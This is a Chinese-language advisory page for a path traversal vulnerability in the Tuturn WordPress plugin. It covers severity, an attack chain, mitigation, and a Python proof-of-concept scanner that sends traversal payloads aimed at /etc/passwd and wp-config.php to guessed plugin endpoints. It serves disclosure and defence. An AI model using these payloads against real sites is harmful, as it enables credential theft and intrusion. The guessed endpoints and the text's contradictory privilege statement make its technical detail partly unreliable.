CVE-2025-64235 CVSS 6.5 中危

CVE-2025-64235 AmentoTech Tuturn插件路径遍历漏洞

披露日期: 2025-12-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64235

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AmentoTech Tuturn (WordPress Plugin)

漏洞概述

CVE-2025-64235是AmentoTech Tuturn WordPress插件中的一个路径遍历（Path Traversal）漏洞，CVSS评分6.5，属于中等严重程度。该漏洞由于对用户输入的路径名限制不当，允许攻击者读取服务器上的任意文件。攻击者可以通过构造特殊的目录遍历序列（如../）来绕过安全限制，访问web根目录之外的文件，包括配置文件、源代码、其他网站的敏感数据等。此漏洞需要低权限认证即可利用，无需用户交互，影响Tuturn 3.6之前的所有版本。路径遍历漏洞是web应用中最常见的安全问题之一，可能导致敏感信息泄露，严重时甚至可能协助攻击者完成远程代码执行。

技术细节

该路径遍历漏洞存在于Tuturn插件的文件下载功能中。攻击者通过构造包含目录遍历字符的特殊请求，可以访问服务器上的任意文件。典型的利用方式是使用相对路径遍历序列（如../../../etc/passwd或..\..\..\windows\win.ini）来跳出web应用目录。漏洞原因通常是程序在处理文件路径时未对用户输入进行充分的验证和过滤，直接将用户可控的路径参数传递给文件操作函数。攻击者通常会尝试访问系统配置文件（如wp-config.php）以获取数据库凭证，或访问其他敏感文件。此漏洞的CVSS向量显示攻击复杂度低（AC:L），无需特殊权限即可利用（PR:L），主要影响机密性（C:H）。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的Tuturn插件版本

STEP 2

步骤2

攻击者确定存在路径遍历漏洞的文件下载端点

STEP 3

步骤3

攻击者构造包含目录遍历序列的恶意请求（如../../../../etc/passwd）

STEP 4

步骤4

服务器未正确验证路径，将请求的文件返回给攻击者

STEP 5

步骤5

攻击者获取敏感文件内容，可能包括wp-config.php等配置文件

STEP 6

步骤6

利用获取的凭证进一步渗透或获取更多系统权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64235 Path Traversal PoC
# Affected: AmentoTech Tuturn < 3.6

import requests
import sys

target = "http://target-site.com"

# Common path traversal payloads
payloads = [
    "../../../../etc/passwd",
    "..\..\..\..\windows\win.ini",
    "../../../wp-config.php",
    "../../../../../../etc/passwd",
    "....//....//....//etc/passwd"
]

# Try to identify the vulnerable endpoint
endpoints = [
    "/wp-admin/admin-ajax.php?action=tuturn_download",
    "/wp-content/plugins/tuturn/includes/download.php",
    "/?action=tuturn_download&file="
]

def test_path_traversal():
    print(f"[*] Testing CVE-2025-64235 on {target}")
    
    for endpoint in endpoints:
        for payload in payloads:
            url = f"{target}{endpoint}{payload}"
            try:
                response = requests.get(url, timeout=10)
                if response.status_code == 200:
                    if "root:" in response.text or "\[extensions\]" in response.text:
                        print(f"[!] Vulnerable! Found: {url}")
                        print(f"[+] Content preview:\n{response.text[:500]}")
                        return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Error: {e}")
    
    print("[*] No vulnerable endpoint found")
    return False

if __name__ == "__main__":
    test_path_traversal()

影响范围

Tuturn < 3.6

防御指南

临时缓解措施

立即将Tuturn插件升级到最新版本（3.6及以上）；如果无法立即升级，可在web应用层实施输入过滤，移除或编码路径遍历字符；同时限制文件下载功能仅能访问允许的目录范围。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表